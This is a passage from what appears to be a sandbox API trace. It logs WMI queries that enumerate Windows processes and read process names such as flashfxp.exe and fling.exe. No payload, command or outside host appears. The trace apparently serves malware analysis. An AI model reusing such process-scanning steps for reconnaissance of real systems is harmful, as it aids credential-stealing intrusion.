Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x36e12c | out: ppvObject=0x36e12c*=0x0) returned 0x80004002 [0225.069] IUnknown:QueryInterface (in: This=0x5ebb530, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x36e0dc | out: ppvObject=0x36e0dc*=0x0) returned 0x80004002 [0225.069] IUnknown:QueryInterface (in: This=0x5ebb530, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e0e8 | out: ppvObject=0x36e0e8*=0x5ebb534) returned 0x0 [0225.069] IMarshal:GetUnmarshalClass (in: This=0x5ebb534, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x36e0f0 | out: pCid=0x36e0f0*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0225.069] IUnknown:Release (This=0x5ebb534) returned 0x3 [0225.069] CoGetContextToken (in: pToken=0x36e148 | out: pToken=0x36e148) returned 0x0 [0225.069] CoGetContextToken (in: pToken=0x36e55c | out: pToken=0x36e55c) returned 0x0 [0225.069] IUnknown:QueryInterface (in: This=0x5ebb530, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e5dc | out: ppvObject=0x36e5dc*=0x0) returned 0x80004002 [0225.069] IUnknown:Release (This=0x5ebb530) returned 0x2 [0225.069] CoGetContextToken (in: pToken=0x36eb44 | out: pToken=0x36eb44) returned 0x0 [0225.069] CoGetContextToken (in: pToken=0x36eaa4 | out: pToken=0x36eaa4) returned 0x0 [0225.070] IUnknown:QueryInterface (in: This=0x5ebb530, riid=0x36eb74*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x36eb70 | out: ppvObject=0x36eb70*=0x5ebb530) returned 0x0 [0225.070] IUnknown:AddRef (This=0x5ebb530) returned 0x4 [0225.070] IUnknown:Release (This=0x5ebb530) returned 0x3 [0225.070] IUnknown:Release (This=0x5ebb530) returned 0x2 [0225.070] CoTaskMemFree (pv=0x5ebae70) [0225.070] CoGetContextToken (in: pToken=0x36eeb4 | out: pToken=0x36eeb4) returned 0x0 [0225.070] IUnknown:AddRef (This=0x5ebb530) returned 0x3 [0225.070] IWbemClassObject:Get (in: This=0x5ebb530, wszName="__GENUS", lFlags=0, pVal=0x36f1b4*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x36f234*=0, plFlavor=0x36f230*=0 | out: pVal=0x36f1b4*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x36f234*=3, plFlavor=0x36f230*=64) returned 0x0 [0225.071] IWbemClassObject:Get (in: This=0x5ebb530, wszName="__PATH", lFlags=0, pVal=0x36f198*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x36f21c*=0, plFlavor=0x36f218*=0 | out: pVal=0x36f198*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"3036\"", varVal2=0x0), pType=0x36f21c*=8, plFlavor=0x36f218*=64) returned 0x0 [0225.071] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"3036\"") returned 0x66 [0225.071] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"3036\"") returned 0x66 [0225.071] CoGetObjectContext (in: riid=0x2414360*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x36f1c4 | out: ppv=0x36f1c4*=0x6ee4bc) returned 0x0 [0225.071] IComThreadingInfo:GetCurrentApartmentType (in: This=0x6ee4bc, pAptType=0x36f1bc | out: pAptType=0x36f1bc*=1) returned 0x0 [0225.071] IUnknown:QueryInterface (in: This=0x6ee4bc, riid=0x2414348*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x36f1c0 | out: ppvObject=0x36f1c0*=0x0) returned 0x80004002 [0225.071] IUnknown:Release (This=0x6ee4bc) returned 0x1 [0225.072] CoGetClassObject (in: rclsid=0x761ab4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x71ea6bd4*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x36eb30 | out: ppv=0x36eb30*=0x5ebae70) returned 0x0 [0225.073] WbemDefPath:IUnknown:QueryInterface (in: This=0x5ebae70, riid=0x71e6dd3c*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x36ed48 | out: ppvObject=0x36ed48*=0x0) returned 0x80004002 [0225.073] WbemDefPath:IClassFactory:CreateInstance (in: This=0x5ebae70, pUnkOuter=0x0, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36ed54 | out: ppvObject=0x36ed54*=0x5eb8818) returned 0x0 [0225.073] WbemDefPath:IUnknown:Release (This=0x5ebae70) returned 0x0 [0225.073] WbemDefPath:IUnknown:QueryInterface (in: This=0x5eb8818, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e974 | out: ppvObject=0x36e974*=0x5eb8818) returned 0x0 [0225.073] WbemDefPath:IUnknown:QueryInterface (in: This=0x5eb8818, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x36e928 | out: ppvObject=0x36e928*=0x0) returned 0x80004002 [0225.073] WbemDefPath:IUnknown:AddRef (This=0x5eb8818) returned 0x3 [0225.073] WbemDefPath:IUnknown:QueryInterface (in: This=0x5eb8818, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x36e284 | out: ppvObject=0x36e284*=0x0) returned 0x80004002 [0225.073] WbemDefPath:IUnknown:QueryInterface (in: This=0x5eb8818, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x36e234 | out: ppvObject=0x36e234*=0x0) returned 0x80004002 [0225.073] WbemDefPath:IUnknown:QueryInterface (in: This=0x5eb8818, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e240 | out: ppvObject=0x36e240*=0x5ebae80) returned 0x0 [0225.073] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x5ebae80, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x36e248 | out: pCid=0x36e248*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0225.073] WbemDefPath:IUnknown:Release (This=0x5ebae80) returned 0x3 [0225.073] CoGetContextToken (in: pToken=0x36e2a0 | out: pToken=0x36e2a0) returned 0x0 [0225.074] CoGetContextToken (in: pToken=0x36e6b4 | out: pToken=0x36e6b4) returned 0x0 [0225.074] WbemDefPath:IUnknown:QueryInterface (in: This=0x5eb8818, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e734 | out: ppvObject=0x36e734*=0x0) returned 0x80004002 [0225.074] WbemDefPath:IUnknown:Release (This=0x5eb8818) returned 0x2 [0225.074] WbemDefPath:IUnknown:Release (This=0x5eb8818) returned 0x1 [0225.074] CoGetContextToken (in: pToken=0x36f044 | out: pToken=0x36f044) returned 0x0 [0225.074] CoGetContextToken (in: pToken=0x36efa4 | out: pToken=0x36efa4) returned 0x0 [0225.074] WbemDefPath:IUnknown:QueryInterface (in: This=0x5eb8818, riid=0x36f074*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x36f070 | out: ppvObject=0x36f070*=0x5eb8818) returned 0x0 [0225.074] WbemDefPath:IUnknown:AddRef (This=0x5eb8818) returned 0x3 [0225.074] WbemDefPath:IUnknown:Release (This=0x5eb8818) returned 0x2 [0225.074] WbemDefPath:IWbemPath:SetText (This=0x5eb8818, uMode=0x4, pszPath="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"3036\"") returned 0x0 [0225.074] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x768a58, puCount=0x36f1f0 | out: puCount=0x36f1f0*=0x2) returned 0x0 [0225.074] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1ec*=0x0, pszText=0x0 | out: puBuffLength=0x36f1ec*=0xf, pszText=0x0) returned 0x0 [0225.074] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1ec*=0xf, pszText="00000000000000" | out: puBuffLength=0x36f1ec*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0225.074] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x768a58, puCount=0x36f1bc | out: puCount=0x36f1bc*=0x2) returned 0x0 [0225.074] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1b8*=0x0, pszText=0x0 | out: puBuffLength=0x36f1b8*=0xf, pszText=0x0) returned 0x0 [0225.074] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1b8*=0xf, pszText="00000000000000" | out: puBuffLength=0x36f1b8*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0225.074] IWbemClassObject:Get (in: This=0x5ebb530, wszName="Name", lFlags=0, pVal=0x36f1b8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x26efea0*=0, plFlavor=0x26efea4*=0 | out: pVal=0x36f1b8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="flashfxp.exe", varVal2=0x0), pType=0x26efea0*=8, plFlavor=0x26efea4*=0) returned 0x0 [0225.074] SysStringByteLen (bstr="flashfxp.exe") returned 0x18 [0225.074] SysStringByteLen (bstr="flashfxp.exe") returned 0x18 [0225.075] IWbemClassObject:Get (in: This=0x5ebb530, wszName="Name", lFlags=0, pVal=0x36f1c0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x26efea0*=8, plFlavor=0x26efea4*=0 | out: pVal=0x36f1c0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="flashfxp.exe", varVal2=0x0), pType=0x26efea0*=8, plFlavor=0x26efea4*=0) returned 0x0 [0225.075] SysStringByteLen (bstr="flashfxp.exe") returned 0x18 [0225.075] SysStringByteLen (bstr="flashfxp.exe") returned 0x18 [0225.075] CoTaskMemAlloc (cb=0x4) returned 0x5ebaeb0 [0225.075] IEnumWbemClassObject:Next (in: This=0x70f9f0, lTimeout=-1, uCount=0x1, apObjects=0x5ebaeb0, puReturned=0x26dde18 | out: apObjects=0x5ebaeb0*=0x5ebb6c8, puReturned=0x26dde18*=0x1) returned 0x0 [0225.177] IUnknown:QueryInterface (in: This=0x5ebb6c8, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e81c | out: ppvObject=0x36e81c*=0x5ebb6c8) returned 0x0 [0225.177] IUnknown:QueryInterface (in: This=0x5ebb6c8, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x36e7d0 | out: ppvObject=0x36e7d0*=0x0) returned 0x80004002 [0225.177] IUnknown:QueryInterface (in: This=0x5ebb6c8, riid=0x71e41e84*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x36e5f8 | out: ppvObject=0x36e5f8*=0x0) returned 0x80004002 [0225.178] IUnknown:AddRef (This=0x5ebb6c8) returned 0x3 [0225.178] IUnknown:QueryInterface (in: This=0x5ebb6c8, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x36e12c | out: ppvObject=0x36e12c*=0x0) returned 0x80004002 [0225.178] IUnknown:QueryInterface (in: This=0x5ebb6c8, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x36e0dc | out: ppvObject=0x36e0dc*=0x0) returned 0x80004002 [0225.178] IUnknown:QueryInterface (in: This=0x5ebb6c8, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e0e8 | out: ppvObject=0x36e0e8*=0x5ebb6cc) returned 0x0 [0225.178] IMarshal:GetUnmarshalClass (in: This=0x5ebb6cc, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x36e0f0 | out: pCid=0x36e0f0*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0225.178] IUnknown:Release (This=0x5ebb6cc) returned 0x3 [0225.178] CoGetContextToken (in: pToken=0x36e148 | out: pToken=0x36e148) returned 0x0 [0225.178] CoGetContextToken (in: pToken=0x36e55c | out: pToken=0x36e55c) returned 0x0 [0225.178] IUnknown:QueryInterface (in: This=0x5ebb6c8, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e5dc | out: ppvObject=0x36e5dc*=0x0) returned 0x80004002 [0225.178] IUnknown:Release (This=0x5ebb6c8) returned 0x2 [0225.178] CoGetContextToken (in: pToken=0x36eb44 | out: pToken=0x36eb44) returned 0x0 [0225.178] CoGetContextToken (in: pToken=0x36eaa4 | out: pToken=0x36eaa4) returned 0x0 [0225.178] IUnknown:QueryInterface (in: This=0x5ebb6c8, riid=0x36eb74*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x36eb70 | out: ppvObject=0x36eb70*=0x5ebb6c8) returned 0x0 [0225.178] IUnknown:AddRef (This=0x5ebb6c8) returned 0x4 [0225.179] IUnknown:Release (This=0x5ebb6c8) returned 0x3 [0225.179] IUnknown:Release (This=0x5ebb6c8) returned 0x2 [0225.179] CoTaskMemFree (pv=0x5ebaeb0) [0225.179] CoGetContextToken (in: pToken=0x36eeb4 | out: pToken=0x36eeb4) returned 0x0 [0225.179] IUnknown:AddRef (This=0x5ebb6c8) returned 0x3 [0225.179] IWbemClassObject:Get (in: This=0x5ebb6c8, wszName="__GENUS", lFlags=0, pVal=0x36f1b4*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x36f234*=0, plFlavor=0x36f230*=0 | out: pVal=0x36f1b4*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x36f234*=3, plFlavor=0x36f230*=64) returned 0x0 [0225.179] IWbemClassObject:Get (in: This=0x5ebb6c8, wszName="__PATH", lFlags=0, pVal=0x36f198*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x36f21c*=0, plFlavor=0x36f218*=0 | out: pVal=0x36f198*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"3044\"", varVal2=0x0), pType=0x36f21c*=8, plFlavor=0x36f218*=64) returned 0x0 [0225.180] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"3044\"") returned 0x66 [0225.180] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"3044\"") returned 0x66 [0225.180] CoGetObjectContext (in: riid=0x2414360*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x36f1c4 | out: ppv=0x36f1c4*=0x6ee4bc) returned 0x0 [0225.180] IComThreadingInfo:GetCurrentApartmentType (in: This=0x6ee4bc, pAptType=0x36f1bc | out: pAptType=0x36f1bc*=1) returned 0x0 [0225.180] IUnknown:QueryInterface (in: This=0x6ee4bc, riid=0x2414348*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x36f1c0 | out: ppvObject=0x36f1c0*=0x0) returned 0x80004002 [0225.180] IUnknown:Release (This=0x6ee4bc) returned 0x1 [0225.181] CoGetClassObject (in: rclsid=0x761ab4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x71ea6bd4*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x36eb30 | out: ppv=0x36eb30*=0x5ebaeb0) returned 0x0 [0225.181] WbemDefPath:IUnknown:QueryInterface (in: This=0x5ebaeb0, riid=0x71e6dd3c*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x36ed48 | out: ppvObject=0x36ed48*=0x0) returned 0x80004002 [0225.181] WbemDefPath:IClassFactory:CreateInstance (in: This=0x5ebaeb0, pUnkOuter=0x0, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36ed54 | out: ppvObject=0x36ed54*=0x5eb88f8) returned 0x0 [0225.181] WbemDefPath:IUnknown:Release (This=0x5ebaeb0) returned 0x0 [0225.181] WbemDefPath:IUnknown:QueryInterface (in: This=0x5eb88f8, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e974 | out: ppvObject=0x36e974*=0x5eb88f8) returned 0x0 [0225.181] WbemDefPath:IUnknown:QueryInterface (in: This=0x5eb88f8, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x36e928 | out: ppvObject=0x36e928*=0x0) returned 0x80004002 [0225.182] WbemDefPath:IUnknown:AddRef (This=0x5eb88f8) returned 0x3 [0225.182] WbemDefPath:IUnknown:QueryInterface (in: This=0x5eb88f8, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x36e284 | out: ppvObject=0x36e284*=0x0) returned 0x80004002 [0225.182] WbemDefPath:IUnknown:QueryInterface (in: This=0x5eb88f8, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x36e234 | out: ppvObject=0x36e234*=0x0) returned 0x80004002 [0225.182] WbemDefPath:IUnknown:QueryInterface (in: This=0x5eb88f8, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e240 | out: ppvObject=0x36e240*=0x5ebaec0) returned 0x0 [0225.182] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x5ebaec0, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x36e248 | out: pCid=0x36e248*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0225.182] WbemDefPath:IUnknown:Release (This=0x5ebaec0) returned 0x3 [0225.182] CoGetContextToken (in: pToken=0x36e2a0 | out: pToken=0x36e2a0) returned 0x0 [0225.182] CoGetContextToken (in: pToken=0x36e6b4 | out: pToken=0x36e6b4) returned 0x0 [0225.182] WbemDefPath:IUnknown:QueryInterface (in: This=0x5eb88f8, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e734 | out: ppvObject=0x36e734*=0x0) returned 0x80004002 [0225.182] WbemDefPath:IUnknown:Release (This=0x5eb88f8) returned 0x2 [0225.182] WbemDefPath:IUnknown:Release (This=0x5eb88f8) returned 0x1 [0225.182] CoGetContextToken (in: pToken=0x36f044 | out: pToken=0x36f044) returned 0x0 [0225.182] CoGetContextToken (in: pToken=0x36efa4 | out: pToken=0x36efa4) returned 0x0 [0225.182] WbemDefPath:IUnknown:QueryInterface (in: This=0x5eb88f8, riid=0x36f074*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x36f070 | out: ppvObject=0x36f070*=0x5eb88f8) returned 0x0 [0225.182] WbemDefPath:IUnknown:AddRef (This=0x5eb88f8) returned 0x3 [0225.182] WbemDefPath:IUnknown:Release (This=0x5eb88f8) returned 0x2 [0225.182] WbemDefPath:IWbemPath:SetText (This=0x5eb88f8, uMode=0x4, pszPath="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"3044\"") returned 0x0 [0225.182] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x768a58, puCount=0x36f1f0 | out: puCount=0x36f1f0*=0x2) returned 0x0 [0225.182] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1ec*=0x0, pszText=0x0 | out: puBuffLength=0x36f1ec*=0xf, pszText=0x0) returned 0x0 [0225.182] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1ec*=0xf, pszText="00000000000000" | out: puBuffLength=0x36f1ec*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0225.182] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x768a58, puCount=0x36f1bc | out: puCount=0x36f1bc*=0x2) returned 0x0 [0225.182] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1b8*=0x0, pszText=0x0 | out: puBuffLength=0x36f1b8*=0xf, pszText=0x0) returned 0x0 [0225.183] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1b8*=0xf, pszText="00000000000000" | out: puBuffLength=0x36f1b8*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0225.183] IWbemClassObject:Get (in: This=0x5ebb6c8, wszName="Name", lFlags=0, pVal=0x36f1b8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x26f0714*=0, plFlavor=0x26f0718*=0 | out: pVal=0x36f1b8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="fling.exe", varVal2=0x0), pType=0x26f0714*=8, plFlavor=0x26f0718*=0) returned 0x0 [0225.183] SysStringByteLen (bstr="fling.exe") returned 0x12 [0225.183] SysStringByteLen (bstr="fling.exe") returned 0x12 [0225.183] IWbemClassObject:Get (in: This=0x5ebb6c8, wszName="Name", lFlags=0, pVal=0x36f1c0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x26f0714*=8, plFlavor=0x26f0718*=0 | out: pVal=0x36f1c0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="fling.exe", varVal2=0x0), pType=0x26f0714*=8, plFlavor=0x26f0718*=0) returned 0x0 [0225.183] SysStringByteLen (bstr="fling.exe") returned 0x12 [0225.183] SysStringByteLen (bstr="fling.exe") returned 0x12 [0225.183] CoTaskMemAlloc (cb=0x4) returned 0x5ebaef0 [0225.183] 